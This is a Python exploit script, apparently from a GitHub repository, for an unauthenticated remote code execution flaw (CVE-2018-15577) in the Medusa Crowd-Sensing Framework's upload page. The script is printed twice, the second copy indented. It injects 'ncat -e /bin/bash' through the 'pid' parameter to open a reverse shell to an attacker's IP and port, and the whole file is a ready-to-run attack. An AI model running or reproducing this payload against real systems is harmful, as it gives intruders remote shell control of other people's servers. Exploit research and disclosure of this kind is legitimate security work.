mhaskar/Medusa-Exploit.py

## Medusa-Exploit.py
#!/usr/bin/python

'''
# Exploit Title: Medusa Crowd-Sensing Framework "web_tt_upload.php" Unauthenticated RCE
# Date: 16/08/2018
# Exploit Author: Askar (@mohammadaskar2)
# CVE : CVE-2018-15577 - RESERVED
# Vendor Homepage: https://github.com/USC-NSL/Medusa/
# Version: V1.0
# Tested on: Ubuntu 16.04 / PHP 7.0.28
'''

import requests
import sys
import os

if len(sys.argv) != 4:
    print "[+] Usage : ./exploit.py url local_ip local_port"
    sys.exit(0)

url = sys.argv[1]
ip = sys.argv[2]
port = sys.argv[3]

payload = "?pid=| ncat%20-e%20%2Fbin%2Fbash%20{0}%20{1}%20%23".format(ip, port)

full_url = url + payload

# create a file with some junk data to send
os.system("echo 111 > /tmp/medusa-exploit.txt")

files = {'uploadedfile': open("/tmp/medusa-exploit.txt", "rb")}

print "[+]Sending Payload , check your shell !"

requests.post(full_url, files=files)

# remove the created file
os.system("rm /tmp/medusa-exploit.txt")

print "[+]Temp file removed !"
	#!/usr/bin/python

	'''
	# Exploit Title: Medusa Crowd-Sensing Framework "web_tt_upload.php" Unauthenticated RCE
	# Date: 16/08/2018
	# Exploit Author: Askar (@mohammadaskar2)
	# CVE : CVE-2018-15577 - RESERVED
	# Vendor Homepage: https://github.com/USC-NSL/Medusa/
	# Version: V1.0
	# Tested on: Ubuntu 16.04 / PHP 7.0.28
	'''

	import requests
	import sys
	import os

	if len(sys.argv) != 4:
	print "[+] Usage : ./exploit.py url local_ip local_port"
	sys.exit(0)

	url = sys.argv[1]
	ip = sys.argv[2]
	port = sys.argv[3]

	payload = "?pid=\| ncat%20-e%20%2Fbin%2Fbash%20{0}%20{1}%20%23".format(ip, port)

	full_url = url + payload

	# create a file with some junk data to send
	os.system("echo 111 > /tmp/medusa-exploit.txt")

	files = {'uploadedfile': open("/tmp/medusa-exploit.txt", "rb")}

	print "[+]Sending Payload , check your shell !"

	requests.post(full_url, files=files)

	# remove the created file
	os.system("rm /tmp/medusa-exploit.txt")

	print "[+]Temp file removed !"